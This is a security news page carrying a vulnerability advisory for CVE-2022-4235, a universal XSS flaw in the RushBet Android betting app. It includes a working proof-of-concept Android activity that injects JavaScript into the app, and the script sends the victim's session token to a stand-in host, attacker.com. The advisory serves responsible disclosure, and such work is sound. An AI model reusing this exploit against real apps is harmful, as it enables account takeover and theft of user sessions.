Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-4235: RushBet 2022.23.1-b490616d - Universal XSS | Advisories | Fluid Attacks

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

CVE
#xss#vulnerability#android#linux#js#java#perl

Summary

Name

RushBet 2022.23.1-b490616d - UXSS

Code name

Miller

Product

RushBet

Affected versions

Version 2022.23.1-b490616d

State

Public

Release date

2023-01-10

Vulnerability

Kind

Universal XSS

Rule

429. Universal XSS (UXSS)

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N

CVSSv3 Base Score

6.0

Exploit available

Yes

CVE ID(s)

CVE-2022-4235

Description

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

Vulnerability

This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.

Exploitation

To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:

MainActivity.java

package com.example.badapp;

import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Handler;
import android.os.Bundle;
import android.net.Uri;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        Intent intent = new Intent("android.intent.action.VIEW");
        intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity");
        intent.setData(Uri.parse("https://rushbet.co/"));
        startActivity(intent);

        new Handler().postDelayed(() -> {
            intent.setAction("Action.EvaluateScript");
            intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
            startActivity(intent);
        }, 30000);
    }
}

Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.

Evidence of exploitation

POC-Account-Takeover-Rushbet

Our security policy

We have reserved the CVE-2022-4235 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: RushBet 2022.23.1-b490616d

  • Operating System: GNU/Linux

Mitigation

An updated version of RushBet is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://www.rushbet.co

Timeline

2022-11-29

Vulnerability discovered.

2022-11-30

Vendor contacted.

2022-12-03

Vendor replied acknowledging the report.

2022-12-03

Vendor Confirmed the vulnerability.

2022-12-14

Vulnerability patched.

2023-01-10

Public Disclosure.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907